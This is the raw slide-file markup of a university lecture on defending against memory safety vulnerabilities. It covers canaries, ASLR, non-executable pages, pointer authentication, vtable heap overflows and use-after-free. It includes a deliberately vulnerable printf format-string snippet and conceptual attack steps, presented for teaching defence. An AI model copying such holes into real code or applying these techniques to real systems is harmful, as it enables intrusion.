              <a:rPr lang="en" baseline="30000"/>
              <a:t>36</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> possible pages</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="858" name="Google Shape;8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Languages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Memory-safe languages</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> are designed to check bounds and prevent undefined memory accesses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design, memory-safe languages are not vulnerable to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is the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>only</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> way to stop 100% of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Java, Python, C#, Go,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languages besides C, C++, and Objective C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Addresses</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="864" name="Google Shape;864;p95"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="102700" y="2315225"/>
            <a:ext cx="2919000" cy="1877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vulnerable(char *dest)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Format string vulnerability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printf(dest);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20, stdin);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5" name="Google Shape;865;p9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 (arg to vulnerable)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6" name="Google Shape;866;p95"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3154900" y="1253200"/>
            <a:ext cx="29061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the SFP is a pointer to the stack. How would you print the value of the SFP?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7" name="Google Shape;867;p95"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3154900" y="3639150"/>
            <a:ext cx="2439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solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is 4 bytes below where the SFP points, so its address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0xbfff0404</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>!</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="868" name="Google Shape;868;p95"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8475075" y="2402900"/>
            <a:ext cx="415650" cy="2201575"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="16626" h="88063" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="88063"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="16626" y="88063"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16626" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="597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95"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8475075" y="3864125"/>
            <a:ext cx="207825" cy="246775"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="8313" h="9871" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="9871"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8313" y="9871"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8313" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="259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70" name="Google Shape;870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3169650" y="2177925"/>
            <a:ext cx="101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95"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3169650" y="2898475"/>
            <a:ext cx="2772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output is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bfff0408</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> what is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78" name="Google Shape;87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85" name="Google Shape;885;p9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We can use multiple mitigations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Synergistic protection: one mitigation helps strengthen another mitigation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the attacker to find multiple vulnerabilities to exploit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 in depth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Combining ASLR and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write their own shellcode, because of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use existing code in memory, because they don't know the addresses of those code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defeat ASLR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> non-executable pages, the attacker needs to find two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find a way to leak memory and reveal the address randomization (defeat ASLR)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Second, find a way to write to memory and write a ROP chain (defeat non-executable pages)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="886" name="Google Shape;886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92" name="Google Shape;892;p9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defenses used by Apple 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 is used for user programs (apps) and kernel programs (operating system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 are used whenever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are sandboxed to limit the damage of an exploit (TCB is the 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Trident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the NSO group, a spyware vendor, to exploit iPhones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Safari with a memory corruption vulnerability → execute arbitrary code in the sandbox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to read the kernel stack (operating system memory in the sandbox)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in the kernel (operating system) to execute arbitrary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Combining mitigations forces the attacker to find multiple vulnerabilities to take over your program. The attacker's job is harder, but not impossible!</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="893" name="Google Shape;893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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="899" name="Google Shape;899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mitigations (stack canaries, non-executable pages, ASLR) are effectively free today (insignificant performance impact)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sometimes has to manually enable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Enable ASLR and non-executable pages when running a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Setting a flag to compile a program with stack canaries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default is disabling the mitigation, the default will be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Consider human factors!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Use fail-safe defaults!</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="900" name="Google Shape;900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CISCO</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="906" name="Google Shape;906;p10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Cisco’s Adaptive Security Appliance (ASA)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Cisco: A major vendor of technology products (one of 30 giant companies in the Dow Jones stock index)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ASA: A network security device that can be installed to protect an entire network (e.g. AirBears2)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 used by the ASA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ASLR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for the NSA (or other attackers) to exploit!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Even major companies can forget to enable mitigations. Always enable memory safety mitigations!</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="907" name="Google Shape;907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Internet of Things</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="913" name="Google Shape;913;p101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Takeaway</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: Many (most?) IoT devices don’t enable basic mitigations</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="914" name="Google Shape;914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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="915" name="Google Shape;915;p101"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="288475" y="1431735"/>
          <a:ext cx="8567050" cy="218691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0858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Qualys Security Blog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CVE-2021-3156: Heap-Based Buffer Overflow in Sudo (Baron Samedit)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Animesh Jain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January 26,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Qualys Research Team has discovered a heap overflow vulnerability in sudo, a near-ubiquitous utility available on major Unix-like operating systems. Any unprivileged user can gain root privileges on a vulnerable host using a default sudo configuration by exploiting this vulnerability.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6" name="Google Shape;916;p101" title="Qualys Security B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00" y="1460775"/>
            <a:ext cx="10796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2" name="Google Shape;922;p10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(e.g. Python, Java) stops all memory safety vulnerabilities.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use a non-memory-safe language?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Commonly-cited reason, but mostly a myth: Performance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reason: Legacy, existing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write and reason about your code to ensure memory safety in a non-memory-safe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programmer discipline, and can be tedious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your code for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any external libraries updated for security patches</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="923" name="Google Shape;92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9" name="Google Shape;929;p10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portions of memory either executable or writable, but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writing shellcode to memory and executing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Return-to-libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: Execute an existing function in the C library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Return-oriented programming </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>ROP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>): Create your own code by chaining together small gadgets in existing library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sacrificial value on the stack. If the canary has been changed, someone’s probably attacking our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with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can write around the canary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leaked by another vulnerability (e.g. format string vulnerability)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brute-forced by the attacker</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="930" name="Google Shape;93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36" name="Google Shape;936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pointer authentication code (PAC). Before using the pointer in memory, check if the PAC is still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(or any pointer) with address of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Address space layout randomization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>ASLR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knowing the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 addresses with another vulnerability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Brute-force attack to guess the addresses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multiple mitigations usually forces the attacker to find multiple vulnerabilities to exploit the program (defense-in-depth)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="937" name="Google Shape;937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Non-Memory-Safe Languages?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commonly-cited reason: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0"/>
              <a:t>performance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Comparison of memory allocation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 and C++ (not memory safe):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usually runs in (amortized) constant-time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Java (memory safe): The garbage collector may need to run at any arbitrary point in time, adding a 10–100 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" err="1"/>
              <a:t>ms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> delay as it cleans up memory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943" name="Google Shape;94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Instruction Pointers</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="950" name="Google Shape;950;p10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Remember: You need to overwrite a pointer that will eventually be jumped to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Stack smashing involves the RIP, but there are other targets too (literal function pointers, etc.)</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="951" name="Google Shape;951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57" name="Google Shape;95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958" name="Google Shape;958;p10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an object-oriented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objects can have instance variables and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has </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t>polymorphism</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: implementations of an interface can implement functions differently, similar to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each class has a vtable (table of function pointers), and each object points to its class’s vtable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vtable pointer is usually at the beginning of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a function: Dereference the vtable pointer with an offset to find the function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964" name="Google Shape;964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65" name="Google Shape;965;p108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/>
              <a:t>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/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="966" name="Google Shape;966;p108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7" name="Google Shape;967;p108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68" name="Google Shape;968;p108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9" name="Google Shape;969;p108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0" name="Google Shape;970;p108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1" name="Google Shape;971;p108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2" name="Google Shape;972;p108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73" name="Google Shape;973;p108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08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5" name="Google Shape;975;p108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76" name="Google Shape;976;p108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78" name="Google Shape;978;p108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9" name="Google Shape;979;p108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985" name="Google Shape;985;p10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986" name="Google Shape;986;p109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7" name="Google Shape;987;p109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88" name="Google Shape;988;p109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9" name="Google Shape;989;p109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0" name="Google Shape;990;p109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91" name="Google Shape;991;p109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2" name="Google Shape;992;p109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93" name="Google Shape;993;p109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09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109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96" name="Google Shape;996;p109"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="385375" y="42846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a method of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first follow a pointer on the heap to find the vtable…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99" name="Google Shape;999;p109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109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109"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3752475" y="42670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then follow a pointer in the vtable to find the instructions of the method.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1007" name="Google Shape;1007;p1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08" name="Google Shape;1008;p110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one of the instance variables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buffer we can overflow.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9" name="Google Shape;1009;p110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10" name="Google Shape;1010;p110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11" name="Google Shape;1011;p110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2" name="Google Shape;1012;p110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3" name="Google Shape;1013;p110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4" name="Google Shape;1014;p110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5" name="Google Shape;1015;p110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16" name="Google Shape;1016;p110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7" name="Google Shape;1017;p110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110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19" name="Google Shape;1019;p110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10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21" name="Google Shape;1021;p110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110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1028" name="Google Shape;1028;p1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29" name="Google Shape;1029;p111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attacker controls everything above the instance variable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on the heap, including the vtable pointer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0" name="Google Shape;1030;p111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31" name="Google Shape;1031;p111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32" name="Google Shape;1032;p111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3" name="Google Shape;1033;p111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4" name="Google Shape;1034;p111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5" name="Google Shape;1035;p111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6" name="Google Shape;1036;p111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37" name="Google Shape;1037;p111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11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9" name="Google Shape;1039;p111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40" name="Google Shape;1040;p111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42" name="Google Shape;1042;p111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111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1049" name="Google Shape;1049;p1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1050" name="Google Shape;1050;p112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1" name="Google Shape;1051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1052" name="Google Shape;1052;p112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vtable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now a pointer to shellcode. If method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called, it will execute shellcode!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136650" y="22057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" name="Google Shape;1054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55" name="Google Shape;1055;p112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56" name="Google Shape;1056;p112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57" name="Google Shape;1057;p112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8" name="Google Shape;1058;p112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59" name="Google Shape;1059;p112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112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112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62" name="Google Shape;1062;p112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64" name="Google Shape;1064;p112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112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112"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2488450" y="24708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1072" name="Google Shape;1072;p1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Heap overflow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Objects are allocated in the heap (using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in C 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dirty="0"/>
              <a:t> in C++)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write to a buffer in the heap is not checked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overflows the buffer and overwrites the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" err="1"/>
              <a:t>vtable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> pointer of the next object to point to a malicious </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" err="1"/>
              <a:t>vtable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>, with pointers to malicious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next object’s function is called, accessing the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" err="1"/>
              <a:t>vtable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> pointer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Use-after-free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object is deallocated too early (using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 dirty="0"/>
              <a:t> in C or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dirty="0"/>
              <a:t> in C++)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allocates memory, which returns the memory freed by the object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overwrites a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" err="1"/>
              <a:t>vtable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> pointer under the attacker’s control to point to a malicious </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" err="1"/>
              <a:t>vtable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>, with pointers to malicious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deallocated object’s function is called, accessing the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" err="1"/>
              <a:t>vtable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> pointer</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1073" name="Google Shape;1073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079" name="Google Shape;1079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pic>
        <p:nvPicPr>
          <p:cNvPr id="1080" name="Google Shape;1080;p114"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3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1" name="Google Shape;1081;p114"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="7171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{5F6F63FF-C5C4-4278-AC2D-502748384C56}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CWE-125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CWE-119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CWE-89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CWE-416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CWE-352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CWE-190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CWE-476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CWE-434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CWE-732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CWE-94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10819</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>2290</Paragraphs>
  <Slides>111</Slides>
  <Notes>111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4" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>CS 161</vt:lpstr>
      <vt:lpstr>Announcement </vt:lpstr>
      <vt:lpstr>Mitigating Memory Safety Vulnerabilities</vt:lpstr>
      <vt:lpstr>Next: Memory Safety Mitigations</vt:lpstr>
      <vt:lpstr>Today: Defending Against Memory Safety Vulnerabilities</vt:lpstr>
      <vt:lpstr>Today: Defending Against Memory Safety Vulnerabilities</vt:lpstr>
      <vt:lpstr>Using Memory-Safe Languages</vt:lpstr>
      <vt:lpstr>Today: Defending Against Memory Safety Vulnerabilities</vt:lpstr>
      <vt:lpstr>Memory-Safe Languages</vt:lpstr>
      <vt:lpstr>Why Use Non-Memory-Safe Languages?</vt:lpstr>
      <vt:lpstr>The Cited Reason: The Myth of Performance</vt:lpstr>
      <vt:lpstr>The Cited Reason: The Myth of Performance</vt:lpstr>
      <vt:lpstr>The Real Reason: Legacy</vt:lpstr>
      <vt:lpstr>Writing Memory-Safe Code</vt:lpstr>
      <vt:lpstr>Today: Defending Against Memory Safety Vulnerabilities</vt:lpstr>
      <vt:lpstr>Writing Memory-Safe Code</vt:lpstr>
      <vt:lpstr>Writing Memory-Safe Code</vt:lpstr>
      <vt:lpstr>Building Secure Software</vt:lpstr>
      <vt:lpstr>Today: Defending Against Memory Safety Vulnerabilities</vt:lpstr>
      <vt:lpstr>Approaches for Building Secure Software/Systems</vt:lpstr>
      <vt:lpstr>Approaches for Building Secure Software/Systems</vt:lpstr>
      <vt:lpstr>Testing for Software Security Issues</vt:lpstr>
      <vt:lpstr>Working Towards Secure Systems</vt:lpstr>
      <vt:lpstr>Exploit Mitigations</vt:lpstr>
      <vt:lpstr>Today: Defending Against Memory Safety Vulnerabilities</vt:lpstr>
      <vt:lpstr>Exploit Mitigations</vt:lpstr>
      <vt:lpstr>Recall: Putting Together an Attack</vt:lpstr>
      <vt:lpstr>Recall: Putting Together an Attack</vt:lpstr>
      <vt:lpstr>Mitigation: Non-Executable Pages</vt:lpstr>
      <vt:lpstr>Recall: Putting Together an Attack</vt:lpstr>
      <vt:lpstr>Non-Executable Pages</vt:lpstr>
      <vt:lpstr>Non-Executable Pages</vt:lpstr>
      <vt:lpstr>Subverting Non-Executable Pages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Mitigation: Stack Canaries</vt:lpstr>
      <vt:lpstr>Recall: Putting Together an Attack</vt:lpstr>
      <vt:lpstr>Stack Canaries</vt:lpstr>
      <vt:lpstr>Stack Canaries: Properties</vt:lpstr>
      <vt:lpstr>Stack Canaries</vt:lpstr>
      <vt:lpstr>Stack Canaries: Efficiency</vt:lpstr>
      <vt:lpstr>Subverting Stack Canaries</vt:lpstr>
      <vt:lpstr>Subverting Stack Canaries: Leaking the Canary</vt:lpstr>
      <vt:lpstr>Subverting Stack Canaries: Bypassing the Canary</vt:lpstr>
      <vt:lpstr>Subverting Stack Canaries: Guessing the Canary</vt:lpstr>
      <vt:lpstr>Subverting Stack Canaries: Guessing the Canary</vt:lpstr>
      <vt:lpstr>Mitigation: Pointer Authentication</vt:lpstr>
      <vt:lpstr>Recall: Putting Together an Attack</vt:lpstr>
      <vt:lpstr>Reminder: 32-Bit and 64-Bit Processors</vt:lpstr>
      <vt:lpstr>Pointer Authentication</vt:lpstr>
      <vt:lpstr>Pointer Authentication: Properties of the PAC</vt:lpstr>
      <vt:lpstr>Subverting Pointer Authentication</vt:lpstr>
      <vt:lpstr>Defenses Against Pointer Reuse</vt:lpstr>
      <vt:lpstr>Pointer Authentication on ARM</vt:lpstr>
      <vt:lpstr>Mitigation: Address Space Layout Randomization (ASLR)</vt:lpstr>
      <vt:lpstr>Recall: Putting Together an Attack</vt:lpstr>
      <vt:lpstr>Recall: x86 Memory Layout</vt:lpstr>
      <vt:lpstr>Recall: x86 Memory Layout</vt:lpstr>
      <vt:lpstr>Recall: x86 Memory Layout</vt:lpstr>
      <vt:lpstr>Address Space Layout Randomization</vt:lpstr>
      <vt:lpstr>ASLR: Efficiency</vt:lpstr>
      <vt:lpstr>Subverting ASLR</vt:lpstr>
      <vt:lpstr>Relative Addresses</vt:lpstr>
      <vt:lpstr>Combining Mitigations</vt:lpstr>
      <vt:lpstr>Combining Mitigations</vt:lpstr>
      <vt:lpstr>Combining Mitigations</vt:lpstr>
      <vt:lpstr>Enabling Mitigations</vt:lpstr>
      <vt:lpstr>Enabling Mitigations: CISCO</vt:lpstr>
      <vt:lpstr>Enabling Mitigations: Internet of Things</vt:lpstr>
      <vt:lpstr>Summary: Memory Safety Mitigations</vt:lpstr>
      <vt:lpstr>Summary: Memory Safety Mitigations</vt:lpstr>
      <vt:lpstr>Summary: Memory Safety Mitigations</vt:lpstr>
      <vt:lpstr>Heap Vulnerabilities</vt:lpstr>
      <vt:lpstr>Targeting Instruction Pointers</vt:lpstr>
      <vt:lpstr>C++ vtables</vt:lpstr>
      <vt:lpstr>C++ vtables</vt:lpstr>
      <vt:lpstr>C++ vtables</vt:lpstr>
      <vt:lpstr>C++ vtables</vt:lpstr>
      <vt:lpstr>C++ vtables</vt:lpstr>
      <vt:lpstr>C++ vtables</vt:lpstr>
      <vt:lpstr>Heap Vulnerabilities</vt:lpstr>
      <vt:lpstr>Top 25 Most Dangerous Software Weaknesses (2020)</vt:lpstr>
      <vt:lpstr>Writing Robust Exploits</vt:lpstr>
      <vt:lpstr>NOP Sleds</vt:lpstr>
      <vt:lpstr>Serialization</vt:lpstr>
      <vt:lpstr>Serialization in Java and Python</vt:lpstr>
      <vt:lpstr>Using Serialization</vt:lpstr>
      <vt:lpstr>Serialization Vulnerabilities in pickle (Python)</vt:lpstr>
      <vt:lpstr>A pickle (Python) exploit</vt:lpstr>
      <vt:lpstr>Serialization Vulnerabilities in Java</vt:lpstr>
      <vt:lpstr>Log4j</vt:lpstr>
      <vt:lpstr>Log4j and JNDI (Java Naming &amp; Directory Interface)</vt:lpstr>
      <vt:lpstr>Serialization: Detection and Defenses</vt:lpstr>
      <vt:lpstr>Summary: Memory Safety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Memory Safety Vulnerabilities</dc:title>
  <cp:lastModifiedBy>Jian Xiang</cp:lastModifiedBy>
  <cp:revision>46</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-11-30T14:27:45Z</dcterms:modified>
</cp:coreProperties>
</file>